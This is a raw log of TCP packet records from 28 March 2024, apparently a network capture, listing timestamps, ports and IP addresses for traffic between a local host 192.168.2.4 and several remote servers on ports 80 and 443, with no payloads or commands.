Mar 28, 2024 09:15:00.141323090 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.142422915 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.142514944 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.143124104 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.143147945 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.143210888 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.143791914 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.143831015 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.143882990 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.144104004 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.144120932 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.144177914 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.145804882 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.145942926 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.145997047 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.146353960 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.146397114 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.146423101 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.146436930 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.148257017 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.148274899 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.148334026 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.148478031 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.148521900 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.148540020 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.148646116 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.150489092 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.150602102 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.150640011 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.150919914 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.151998997 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.152005911 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.152049065 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.152077913 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.152890921 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.152899027 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.152946949 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.154198885 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.154226065 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.154294968 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.155395985 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.155404091 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.155457973 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.156274080 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.156303883 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.156330109 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.156362057 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.157253027 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.157304049 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.157382965 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.158262014 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.158279896 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.158330917 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.158351898 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.158404112 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.158462048 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.158512115 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.159576893 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.159595013 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.159650087 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.160393000 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.160410881 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.160480022 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.161648989 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.161667109 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.161731958 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.162400007 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.162419081 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.162473917 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.164076090 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.164093018 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.164154053 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.164195061 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.164393902 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.164412022 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.164468050 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.166438103 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.166471958 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.166524887 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.166553020 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.168320894 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.168344975 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.168365955 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.168389082 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.168404102 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.168414116 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.168441057 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.168525934 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.170252085 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.170274019 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.170346022 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.170551062 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.170572042 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.170619965 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.171962023 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.172040939 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.172043085 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.172091961 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.172569036 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.172591925 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.172641039 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.173976898 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.174000025 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.174113035 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.174896955 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.174937010 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.174984932 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.175971031 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.175992966 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.176016092 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.176048994 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.176810026 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.176832914 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.176876068 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.178297997 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.178323984 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.178369045 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.178395987 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.179065943 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.179089069 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.179135084 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.179734945 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.179757118 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.179805040 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.181163073 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.181200027 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.181250095 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.181472063 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181493998 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181515932 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181535006 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181535006 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181562901 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181612015 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181673050 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181694031 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181694984 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181715965 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181754112 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181780100 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181812048 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181812048 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181833029 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181858063 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181873083 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181873083 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181879044 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181901932 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181914091 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181922913 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181940079 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181967974 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181967974 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.181971073 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.181993008 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.182013988 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.182061911 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.182079077 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.182079077 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.182079077 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.182085037 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.182106972 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.182110071 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.182135105 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.182173014 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.182218075 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.182554007 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.182616949 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.183125973 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.183532953 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.183553934 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.183589935 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.183612108 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.183640003 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.183697939 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.183757067 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.185256004 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.185277939 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.185332060 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.185374022 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.185395956 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.185436964 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.185468912 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.187568903 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.187592030 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.187652111 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.187704086 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.187735081 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.187752962 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.188364029 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.188417912 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.188640118 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.188648939 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.188693047 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.188708067 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.188734055 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.188771963 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.188792944 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.188954115 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.189014912 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.189043045 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.189681053 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.189912081 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.189934969 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.189968109 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.189994097 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.190887928 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.190911055 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.190948963 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.190975904 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.190984011 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.191023111 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.191907883 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.191930056 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.192006111 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.192297935 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.192344904 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.192393064 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.193624020 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.193646908 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.193667889 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.193690062 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.193732023 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.193742990 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.195115089 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.195172071 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.195627928 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.195801973 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.195986032 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.197326899 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.197350979 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.197401047 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.197767019 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.197788954 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.197911024 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.198790073 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.198854923 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.199289083 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.199318886 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.200171947 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.200320005 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.200329065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.200378895 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.200656891 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.200673103 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.200836897 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.201649904 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.201710939 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.201761961 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.203454018 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.203475952 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.203573942 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.204361916 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.204658985 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.204793930 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.204808950 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.205727100 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.205851078 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.205985069 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.205998898 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.206043959 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.206052065 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.206084013 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.206093073 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.207026005 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.207387924 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.207423925 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.207524061 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.207578897 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.207634926 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.207643986 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.209307909 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.209325075 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.209418058 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.209434986 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.209466934 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.209479094 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.209481001 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.209500074 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.210314035 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.210937023 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.210998058 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.211045980 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.211071968 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.211072922 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.211927891 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.212528944 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.212541103 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.213165045 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.213222027 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.213284016 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.213284016 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.214030027 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.214272976 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.214438915 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.214441061 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.215065956 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.215163946 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.216121912 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.216255903 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.216270924 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.216869116 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.216968060 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.216983080 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.217175961 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.217719078 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.217750072 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.218890905 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.218952894 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.219016075 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.219017029 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.219146967 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.219196081 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.219695091 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.219825029 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.220546007 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.220566988 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.220766068 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.220808983 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.220866919 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.220866919 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.222193003 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.222274065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.222345114 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.222345114 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.222374916 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.222419024 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.222453117 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.222888947 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.224086046 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.224095106 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.224505901 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.224545956 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.224598885 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.224598885 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.225732088 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.225764990 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.225768089 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.225843906 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.225961924 CET	80	49735	5.42.66.22	192.168.2.4
